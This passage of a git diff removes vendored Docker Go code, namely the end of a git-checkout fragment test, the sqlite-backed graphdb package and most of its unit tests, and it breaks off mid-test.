-	if _, err = gitWithinDir(gitDir, "config", "user.email", "test@docker.com"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "config", "user.name", "Docker test"); err != nil {
-		t.Fatal(err)
-	}
-
-	if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch"), 0644); err != nil {
-		t.Fatal(err)
-	}
-
-	subDir := filepath.Join(gitDir, "subdir")
-	if err = os.Mkdir(subDir, 0755); err != nil {
-		t.Fatal(err)
-	}
-
-	if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 5000"), 0644); err != nil {
-		t.Fatal(err)
-	}
-
-	if runtime.GOOS != "windows" {
-		if err = os.Symlink("../subdir", filepath.Join(gitDir, "parentlink")); err != nil {
-			t.Fatal(err)
-		}
-
-		if err = os.Symlink("/subdir", filepath.Join(gitDir, "absolutelink")); err != nil {
-			t.Fatal(err)
-		}
-	}
-
-	if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "commit", "-am", "First commit"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "checkout", "-b", "test"); err != nil {
-		t.Fatal(err)
-	}
-
-	if err = ioutil.WriteFile(filepath.Join(gitDir, "Dockerfile"), []byte("FROM scratch\nEXPOSE 3000"), 0644); err != nil {
-		t.Fatal(err)
-	}
-
-	if err = ioutil.WriteFile(filepath.Join(subDir, "Dockerfile"), []byte("FROM busybox\nEXPOSE 5000"), 0644); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "add", "-A"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "commit", "-am", "Branch commit"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err = gitWithinDir(gitDir, "checkout", "master"); err != nil {
-		t.Fatal(err)
-	}
-
-	type singleCase struct {
-		frag string
-		exp  string
-		fail bool
-	}
-
-	cases := []singleCase{
-		{"", "FROM scratch", false},
-		{"master", "FROM scratch", false},
-		{":subdir", "FROM scratch" + eol + "EXPOSE 5000", false},
-		{":nosubdir", "", true},   // missing directory error
-		{":Dockerfile", "", true}, // not a directory error
-		{"master:nosubdir", "", true},
-		{"master:subdir", "FROM scratch" + eol + "EXPOSE 5000", false},
-		{"master:../subdir", "", true},
-		{"test", "FROM scratch" + eol + "EXPOSE 3000", false},
-		{"test:", "FROM scratch" + eol + "EXPOSE 3000", false},
-		{"test:subdir", "FROM busybox" + eol + "EXPOSE 5000", false},
-	}
-
-	if runtime.GOOS != "windows" {
-		// Windows GIT (2.7.1 x64) does not support parentlink/absolutelink. Sample output below
-		// 	git --work-tree .\repo --git-dir .\repo\.git add -A
-		//	error: readlink("absolutelink"): Function not implemented
-		// 	error: unable to index file absolutelink
-		// 	fatal: adding files failed
-		cases = append(cases, singleCase{frag: "master:absolutelink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
-		cases = append(cases, singleCase{frag: "master:parentlink", exp: "FROM scratch" + eol + "EXPOSE 5000", fail: false})
-	}
-
-	for _, c := range cases {
-		r, err := checkoutGit(c.frag, gitDir)
-
-		fail := err != nil
-		if fail != c.fail {
-			t.Fatalf("Expected %v failure, error was %v\n", c.fail, err)
-		}
-		if c.fail {
-			continue
-		}
-
-		b, err := ioutil.ReadFile(filepath.Join(r, "Dockerfile"))
-		if err != nil {
-			t.Fatal(err)
-		}
-
-		if string(b) != c.exp {
-			t.Fatalf("Expected %v, was %v\n", c.exp, string(b))
-		}
-	}
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
deleted file mode 100644
index 8e61ff3b4f..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/conn_sqlite3_linux.go
+++ /dev/null
@@ -1,19 +0,0 @@
-// +build cgo
-
-package graphdb
-
-import (
-	"database/sql"
-
-	_ "github.com/mattn/go-sqlite3" // registers sqlite
-)
-
-// NewSqliteConn opens a connection to a sqlite
-// database.
-func NewSqliteConn(root string) (*Database, error) {
-	conn, err := sql.Open("sqlite3", root)
-	if err != nil {
-		return nil, err
-	}
-	return NewDatabase(conn)
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
deleted file mode 100644
index eca433fa85..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux.go
+++ /dev/null
@@ -1,551 +0,0 @@
-package graphdb
-
-import (
-	"database/sql"
-	"fmt"
-	"path"
-	"strings"
-	"sync"
-)
-
-const (
-	createEntityTable = `
-    CREATE TABLE IF NOT EXISTS entity (
-        id text NOT NULL PRIMARY KEY
-    );`
-
-	createEdgeTable = `
-    CREATE TABLE IF NOT EXISTS edge (
-        "entity_id" text NOT NULL,
-        "parent_id" text NULL,
-        "name" text NOT NULL,
-        CONSTRAINT "parent_fk" FOREIGN KEY ("parent_id") REFERENCES "entity" ("id"),
-        CONSTRAINT "entity_fk" FOREIGN KEY ("entity_id") REFERENCES "entity" ("id")
-        );
-    `
-
-	createEdgeIndices = `
-    CREATE UNIQUE INDEX IF NOT EXISTS "name_parent_ix" ON "edge" (parent_id, name);
-    `
-)
-
-// Entity with a unique id.
-type Entity struct {
-	id string
-}
-
-// An Edge connects two entities together.
-type Edge struct {
-	EntityID string
-	Name     string
-	ParentID string
-}
-
-// Entities stores the list of entities.
-type Entities map[string]*Entity
-
-// Edges stores the relationships between entities.
-type Edges []*Edge
-
-// WalkFunc is a function invoked to process an individual entity.
-type WalkFunc func(fullPath string, entity *Entity) error
-
-// Database is a graph database for storing entities and their relationships.
-type Database struct {
-	conn *sql.DB
-	mux  sync.RWMutex
-}
-
-// IsNonUniqueNameError processes the error to check if it's caused by
-// a constraint violation.
-// This is necessary because the error isn't the same across various
-// sqlite versions.
-func IsNonUniqueNameError(err error) bool {
-	str := err.Error()
-	// sqlite 3.7.17-1ubuntu1 returns:
-	// Set failure: Abort due to constraint violation: columns parent_id, name are not unique
-	if strings.HasSuffix(str, "name are not unique") {
-		return true
-	}
-	// sqlite-3.8.3-1.fc20 returns:
-	// Set failure: Abort due to constraint violation: UNIQUE constraint failed: edge.parent_id, edge.name
-	if strings.Contains(str, "UNIQUE constraint failed") && strings.Contains(str, "edge.name") {
-		return true
-	}
-	// sqlite-3.6.20-1.el6 returns:
-	// Set failure: Abort due to constraint violation: constraint failed
-	if strings.HasSuffix(str, "constraint failed") {
-		return true
-	}
-	return false
-}
-
-// NewDatabase creates a new graph database initialized with a root entity.
-func NewDatabase(conn *sql.DB) (*Database, error) {
-	if conn == nil {
-		return nil, fmt.Errorf("Database connection cannot be nil")
-	}
-	db := &Database{conn: conn}
-
-	// Create root entities
-	tx, err := conn.Begin()
-	if err != nil {
-		return nil, err
-	}
-
-	if _, err := tx.Exec(createEntityTable); err != nil {
-		return nil, err
-	}
-	if _, err := tx.Exec(createEdgeTable); err != nil {
-		return nil, err
-	}
-	if _, err := tx.Exec(createEdgeIndices); err != nil {
-		return nil, err
-	}
-
-	if _, err := tx.Exec("DELETE FROM entity where id = ?", "0"); err != nil {
-		tx.Rollback()
-		return nil, err
-	}
-
-	if _, err := tx.Exec("INSERT INTO entity (id) VALUES (?);", "0"); err != nil {
-		tx.Rollback()
-		return nil, err
-	}
-
-	if _, err := tx.Exec("DELETE FROM edge where entity_id=? and name=?", "0", "/"); err != nil {
-		tx.Rollback()
-		return nil, err
-	}
-
-	if _, err := tx.Exec("INSERT INTO edge (entity_id, name) VALUES(?,?);", "0", "/"); err != nil {
-		tx.Rollback()
-		return nil, err
-	}
-
-	if err := tx.Commit(); err != nil {
-		return nil, err
-	}
-
-	return db, nil
-}
-
-// Close the underlying connection to the database.
-func (db *Database) Close() error {
-	return db.conn.Close()
-}
-
-// Set the entity id for a given path.
-func (db *Database) Set(fullPath, id string) (*Entity, error) {
-	db.mux.Lock()
-	defer db.mux.Unlock()
-
-	tx, err := db.conn.Begin()
-	if err != nil {
-		return nil, err
-	}
-
-	var entityID string
-	if err := tx.QueryRow("SELECT id FROM entity WHERE id = ?;", id).Scan(&entityID); err != nil {
-		if err == sql.ErrNoRows {
-			if _, err := tx.Exec("INSERT INTO entity (id) VALUES(?);", id); err != nil {
-				tx.Rollback()
-				return nil, err
-			}
-		} else {
-			tx.Rollback()
-			return nil, err
-		}
-	}
-	e := &Entity{id}
-
-	parentPath, name := splitPath(fullPath)
-	if err := db.setEdge(parentPath, name, e, tx); err != nil {
-		tx.Rollback()
-		return nil, err
-	}
-
-	if err := tx.Commit(); err != nil {
-		return nil, err
-	}
-	return e, nil
-}
-
-// Exists returns true if a name already exists in the database.
-func (db *Database) Exists(name string) bool {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	e, err := db.get(name)
-	if err != nil {
-		return false
-	}
-	return e != nil
-}
-
-func (db *Database) setEdge(parentPath, name string, e *Entity, tx *sql.Tx) error {
-	parent, err := db.get(parentPath)
-	if err != nil {
-		return err
-	}
-	if parent.id == e.id {
-		return fmt.Errorf("Cannot set self as child")
-	}
-
-	if _, err := tx.Exec("INSERT INTO edge (parent_id, name, entity_id) VALUES (?,?,?);", parent.id, name, e.id); err != nil {
-		return err
-	}
-	return nil
-}
-
-// RootEntity returns the root "/" entity for the database.
-func (db *Database) RootEntity() *Entity {
-	return &Entity{
-		id: "0",
-	}
-}
-
-// Get returns the entity for a given path.
-func (db *Database) Get(name string) *Entity {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	e, err := db.get(name)
-	if err != nil {
-		return nil
-	}
-	return e
-}
-
-func (db *Database) get(name string) (*Entity, error) {
-	e := db.RootEntity()
-	// We always know the root name so return it if
-	// it is requested
-	if name == "/" {
-		return e, nil
-	}
-
-	parts := split(name)
-	for i := 1; i < len(parts); i++ {
-		p := parts[i]
-		if p == "" {
-			continue
-		}
-
-		next := db.child(e, p)
-		if next == nil {
-			return nil, fmt.Errorf("Cannot find child for %s", name)
-		}
-		e = next
-	}
-	return e, nil
-
-}
-
-// List all entities by from the name.
-// The key will be the full path of the entity.
-func (db *Database) List(name string, depth int) Entities {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	out := Entities{}
-	e, err := db.get(name)
-	if err != nil {
-		return out
-	}
-
-	children, err := db.children(e, name, depth, nil)
-	if err != nil {
-		return out
-	}
-
-	for _, c := range children {
-		out[c.FullPath] = c.Entity
-	}
-	return out
-}
-
-// Walk through the child graph of an entity, calling walkFunc for each child entity.
-// It is safe for walkFunc to call graph functions.
-func (db *Database) Walk(name string, walkFunc WalkFunc, depth int) error {
-	children, err := db.Children(name, depth)
-	if err != nil {
-		return err
-	}
-
-	// Note: the database lock must not be held while calling walkFunc
-	for _, c := range children {
-		if err := walkFunc(c.FullPath, c.Entity); err != nil {
-			return err
-		}
-	}
-	return nil
-}
-
-// Children returns the children of the specified entity.
-func (db *Database) Children(name string, depth int) ([]WalkMeta, error) {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	e, err := db.get(name)
-	if err != nil {
-		return nil, err
-	}
-
-	return db.children(e, name, depth, nil)
-}
-
-// Parents returns the parents of a specified entity.
-func (db *Database) Parents(name string) ([]string, error) {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	e, err := db.get(name)
-	if err != nil {
-		return nil, err
-	}
-	return db.parents(e)
-}
-
-// Refs returns the reference count for a specified id.
-func (db *Database) Refs(id string) int {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	var count int
-	if err := db.conn.QueryRow("SELECT COUNT(*) FROM edge WHERE entity_id = ?;", id).Scan(&count); err != nil {
-		return 0
-	}
-	return count
-}
-
-// RefPaths returns all the id's path references.
-func (db *Database) RefPaths(id string) Edges {
-	db.mux.RLock()
-	defer db.mux.RUnlock()
-
-	refs := Edges{}
-
-	rows, err := db.conn.Query("SELECT name, parent_id FROM edge WHERE entity_id = ?;", id)
-	if err != nil {
-		return refs
-	}
-	defer rows.Close()
-
-	for rows.Next() {
-		var name string
-		var parentID string
-		if err := rows.Scan(&name, &parentID); err != nil {
-			return refs
-		}
-		refs = append(refs, &Edge{
-			EntityID: id,
-			Name:     name,
-			ParentID: parentID,
-		})
-	}
-	return refs
-}
-
-// Delete the reference to an entity at a given path.
-func (db *Database) Delete(name string) error {
-	db.mux.Lock()
-	defer db.mux.Unlock()
-
-	if name == "/" {
-		return fmt.Errorf("Cannot delete root entity")
-	}
-
-	parentPath, n := splitPath(name)
-	parent, err := db.get(parentPath)
-	if err != nil {
-		return err
-	}
-
-	if _, err := db.conn.Exec("DELETE FROM edge WHERE parent_id = ? AND name = ?;", parent.id, n); err != nil {
-		return err
-	}
-	return nil
-}
-
-// Purge removes the entity with the specified id
-// Walk the graph to make sure all references to the entity
-// are removed and return the number of references removed
-func (db *Database) Purge(id string) (int, error) {
-	db.mux.Lock()
-	defer db.mux.Unlock()
-
-	tx, err := db.conn.Begin()
-	if err != nil {
-		return -1, err
-	}
-
-	// Delete all edges
-	rows, err := tx.Exec("DELETE FROM edge WHERE entity_id = ?;", id)
-	if err != nil {
-		tx.Rollback()
-		return -1, err
-	}
-	changes, err := rows.RowsAffected()
-	if err != nil {
-		return -1, err
-	}
-
-	// Clear who's using this id as parent
-	refs, err := tx.Exec("DELETE FROM edge WHERE parent_id = ?;", id)
-	if err != nil {
-		tx.Rollback()
-		return -1, err
-	}
-	refsCount, err := refs.RowsAffected()
-	if err != nil {
-		return -1, err
-	}
-
-	// Delete entity
-	if _, err := tx.Exec("DELETE FROM entity where id = ?;", id); err != nil {
-		tx.Rollback()
-		return -1, err
-	}
-
-	if err := tx.Commit(); err != nil {
-		return -1, err
-	}
-
-	return int(changes + refsCount), nil
-}
-
-// Rename an edge for a given path
-func (db *Database) Rename(currentName, newName string) error {
-	db.mux.Lock()
-	defer db.mux.Unlock()
-
-	parentPath, name := splitPath(currentName)
-	newParentPath, newEdgeName := splitPath(newName)
-
-	if parentPath != newParentPath {
-		return fmt.Errorf("Cannot rename when root paths do not match %s != %s", parentPath, newParentPath)
-	}
-
-	parent, err := db.get(parentPath)
-	if err != nil {
-		return err
-	}
-
-	rows, err := db.conn.Exec("UPDATE edge SET name = ? WHERE parent_id = ? AND name = ?;", newEdgeName, parent.id, name)
-	if err != nil {
-		return err
-	}
-	i, err := rows.RowsAffected()
-	if err != nil {
-		return err
-	}
-	if i == 0 {
-		return fmt.Errorf("Cannot locate edge for %s %s", parent.id, name)
-	}
-	return nil
-}
-
-// WalkMeta stores the walk metadata.
-type WalkMeta struct {
-	Parent   *Entity
-	Entity   *Entity
-	FullPath string
-	Edge     *Edge
-}
-
-func (db *Database) children(e *Entity, name string, depth int, entities []WalkMeta) ([]WalkMeta, error) {
-	if e == nil {
-		return entities, nil
-	}
-
-	rows, err := db.conn.Query("SELECT entity_id, name FROM edge where parent_id = ?;", e.id)
-	if err != nil {
-		return nil, err
-	}
-	defer rows.Close()
-
-	for rows.Next() {
-		var entityID, entityName string
-		if err := rows.Scan(&entityID, &entityName); err != nil {
-			return nil, err
-		}
-		child := &Entity{entityID}
-		edge := &Edge{
-			ParentID: e.id,
-			Name:     entityName,
-			EntityID: child.id,
-		}
-
-		meta := WalkMeta{
-			Parent:   e,
-			Entity:   child,
-			FullPath: path.Join(name, edge.Name),
-			Edge:     edge,
-		}
-
-		entities = append(entities, meta)
-
-		if depth != 0 {
-			nDepth := depth
-			if depth != -1 {
-				nDepth--
-			}
-			entities, err = db.children(child, meta.FullPath, nDepth, entities)
-			if err != nil {
-				return nil, err
-			}
-		}
-	}
-
-	return entities, nil
-}
-
-func (db *Database) parents(e *Entity) (parents []string, err error) {
-	if e == nil {
-		return parents, nil
-	}
-
-	rows, err := db.conn.Query("SELECT parent_id FROM edge where entity_id = ?;", e.id)
-	if err != nil {
-		return nil, err
-	}
-	defer rows.Close()
-
-	for rows.Next() {
-		var parentID string
-		if err := rows.Scan(&parentID); err != nil {
-			return nil, err
-		}
-		parents = append(parents, parentID)
-	}
-
-	return parents, nil
-}
-
-// Return the entity based on the parent path and name.
-func (db *Database) child(parent *Entity, name string) *Entity {
-	var id string
-	if err := db.conn.QueryRow("SELECT entity_id FROM edge WHERE parent_id = ? AND name = ?;", parent.id, name).Scan(&id); err != nil {
-		return nil
-	}
-	return &Entity{id}
-}
-
-// ID returns the id used to reference this entity.
-func (e *Entity) ID() string {
-	return e.id
-}
-
-// Paths returns the paths sorted by depth.
-func (e Entities) Paths() []string {
-	out := make([]string, len(e))
-	var i int
-	for k := range e {
-		out[i] = k
-		i++
-	}
-	sortByDepth(out)
-
-	return out
-}
diff --git a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go b/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
deleted file mode 100644
index f0fb074b4d..0000000000
--- a/vendor/github.com/docker/docker/pkg/graphdb/graphdb_linux_test.go
+++ /dev/null
@@ -1,721 +0,0 @@
-package graphdb
-
-import (
-	"database/sql"
-	"fmt"
-	"os"
-	"path"
-	"runtime"
-	"strconv"
-	"testing"
-
-	_ "github.com/mattn/go-sqlite3"
-)
-
-func newTestDb(t *testing.T) (*Database, string) {
-	p := path.Join(os.TempDir(), "sqlite.db")
-	conn, err := sql.Open("sqlite3", p)
-	db, err := NewDatabase(conn)
-	if err != nil {
-		t.Fatal(err)
-	}
-	return db, p
-}
-
-func destroyTestDb(dbPath string) {
-	os.Remove(dbPath)
-}
-
-func TestNewDatabase(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	if db == nil {
-		t.Fatal("Database should not be nil")
-	}
-	db.Close()
-	defer destroyTestDb(dbpath)
-}
-
-func TestCreateRootEntity(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-	root := db.RootEntity()
-	if root == nil {
-		t.Fatal("Root entity should not be nil")
-	}
-}
-
-func TestGetRootEntity(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	e := db.Get("/")
-	if e == nil {
-		t.Fatal("Entity should not be nil")
-	}
-	if e.ID() != "0" {
-		t.Fatalf("Entity id should be 0, got %s", e.ID())
-	}
-}
-
-func TestSetEntityWithDifferentName(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/test", "1")
-	if _, err := db.Set("/other", "1"); err != nil {
-		t.Fatal(err)
-	}
-}
-
-func TestSetDuplicateEntity(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	if _, err := db.Set("/foo", "42"); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/foo", "43"); err == nil {
-		t.Fatalf("Creating an entry with a duplicate path did not cause an error")
-	}
-}
-
-func TestCreateChild(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	child, err := db.Set("/db", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if child == nil {
-		t.Fatal("Child should not be nil")
-	}
-	if child.ID() != "1" {
-		t.Fail()
-	}
-}
-
-func TestParents(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	for i := 1; i < 6; i++ {
-		a := strconv.Itoa(i)
-		if _, err := db.Set("/"+a, a); err != nil {
-			t.Fatal(err)
-		}
-	}
-
-	for i := 6; i < 11; i++ {
-		a := strconv.Itoa(i)
-		p := strconv.Itoa(i - 5)
-
-		key := fmt.Sprintf("/%s/%s", p, a)
-
-		if _, err := db.Set(key, a); err != nil {
-			t.Fatal(err)
-		}
-
-		parents, err := db.Parents(key)
-		if err != nil {
-			t.Fatal(err)
-		}
-
-		if len(parents) != 1 {
-			t.Fatalf("Expected 1 entry for %s got %d", key, len(parents))
-		}
-
-		if parents[0] != p {
-			t.Fatalf("ID %s received, %s expected", parents[0], p)
-		}
-	}
-}
-
-func TestChildren(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	str := "/"
-	for i := 1; i < 6; i++ {
-		a := strconv.Itoa(i)
-		if _, err := db.Set(str+a, a); err != nil {
-			t.Fatal(err)
-		}
-
-		str = str + a + "/"
-	}
-
-	str = "/"
-	for i := 10; i < 30; i++ { // 20 entities
-		a := strconv.Itoa(i)
-		if _, err := db.Set(str+a, a); err != nil {
-			t.Fatal(err)
-		}
-
-		str = str + a + "/"
-	}
-	entries, err := db.Children("/", 5)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(entries) != 11 {
-		t.Fatalf("Expect 11 entries for / got %d", len(entries))
-	}
-
-	entries, err = db.Children("/", 20)
-	if err != nil {
-		t.Fatal(err)
-	}
-
-	if len(entries) != 25 {
-		t.Fatalf("Expect 25 entries for / got %d", len(entries))
-	}
-}
-
-func TestListAllRootChildren(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	for i := 1; i < 6; i++ {
-		a := strconv.Itoa(i)
-		if _, err := db.Set("/"+a, a); err != nil {
-			t.Fatal(err)
-		}
-	}
-	entries := db.List("/", -1)
-	if len(entries) != 5 {
-		t.Fatalf("Expect 5 entries for / got %d", len(entries))
-	}
-}
-
-func TestListAllSubChildren(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	_, err := db.Set("/webapp", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child2, err := db.Set("/db", "2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child4, err := db.Set("/logs", "4")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child3, err := db.Set("/sentry", "3")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	entries := db.List("/webapp", 1)
-	if len(entries) != 3 {
-		t.Fatalf("Expect 3 entries for / got %d", len(entries))
-	}
-
-	entries = db.List("/webapp", 0)
-	if len(entries) != 2 {
-		t.Fatalf("Expect 2 entries for / got %d", len(entries))
-	}
-}
-
-func TestAddSelfAsChild(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	child, err := db.Set("/test", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/test/other", child.ID()); err == nil {
-		t.Fatal("Error should not be nil")
-	}
-}
-
-func TestAddChildToNonExistentRoot(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	if _, err := db.Set("/myapp", "1"); err != nil {
-		t.Fatal(err)
-	}
-
-	if _, err := db.Set("/myapp/proxy/db", "2"); err == nil {
-		t.Fatal("Error should not be nil")
-	}
-}
-
-func TestWalkAll(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-	_, err := db.Set("/webapp", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child2, err := db.Set("/db", "2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child4, err := db.Set("/db/logs", "4")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/logs", child4.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child3, err := db.Set("/sentry", "3")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child5, err := db.Set("/gograph", "5")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := db.Walk("/", func(p string, e *Entity) error {
-		t.Logf("Path: %s Entity: %s", p, e.ID())
-		return nil
-	}, -1); err != nil {
-		t.Fatal(err)
-	}
-}
-
-func TestGetEntityByPath(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-	_, err := db.Set("/webapp", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child2, err := db.Set("/db", "2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child4, err := db.Set("/logs", "4")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child3, err := db.Set("/sentry", "3")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child5, err := db.Set("/gograph", "5")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	entity := db.Get("/webapp/db/logs")
-	if entity == nil {
-		t.Fatal("Entity should not be nil")
-	}
-	if entity.ID() != "4" {
-		t.Fatalf("Expected to get entity with id 4, got %s", entity.ID())
-	}
-}
-
-func TestEnitiesPaths(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-	_, err := db.Set("/webapp", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child2, err := db.Set("/db", "2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child4, err := db.Set("/logs", "4")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child3, err := db.Set("/sentry", "3")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child5, err := db.Set("/gograph", "5")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	out := db.List("/", -1)
-	for _, p := range out.Paths() {
-		t.Log(p)
-	}
-}
-
-func TestDeleteRootEntity(t *testing.T) {
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	if err := db.Delete("/"); err == nil {
-		t.Fatal("Error should not be nil")
-	}
-}
-
-func TestDeleteEntity(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-	_, err := db.Set("/webapp", "1")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child2, err := db.Set("/db", "2")
-	if err != nil {
-		t.Fatal(err)
-	}
-	child4, err := db.Set("/logs", "4")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/db/logs", child4.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child3, err := db.Set("/sentry", "3")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/sentry", child3.ID()); err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/db", child2.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	child5, err := db.Set("/gograph", "5")
-	if err != nil {
-		t.Fatal(err)
-	}
-	if _, err := db.Set("/webapp/same-ref-diff-name", child5.ID()); err != nil {
-		t.Fatal(err)
-	}
-
-	if err := db.Delete("/webapp/sentry"); err != nil {
-		t.Fatal(err)
-	}
-	entity := db.Get("/webapp/sentry")
-	if entity != nil {
-		t.Fatal("Entity /webapp/sentry should be nil")
-	}
-}
-
-func TestCountRefs(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/webapp", "1")
-
-	if db.Refs("1") != 1 {
-		t.Fatal("Expect reference count to be 1")
-	}
-
-	db.Set("/db", "2")
-	db.Set("/webapp/db", "2")
-	if db.Refs("2") != 2 {
-		t.Fatal("Expect reference count to be 2")
-	}
-}
-
-func TestPurgeId(t *testing.T) {
-	// TODO Windows: Port this test
-	if runtime.GOOS == "windows" {
-		t.Skip("Needs porting to Windows")
-	}
-
-	db, dbpath := newTestDb(t)
-	defer destroyTestDb(dbpath)
-
-	db.Set("/webapp", "1")
-
-	if c := db.Refs("1"); c != 1 {
-		t.Fatalf("Expect reference count to be 1, got %d", c)
-	}
-
-	db.Set("/db", "2")
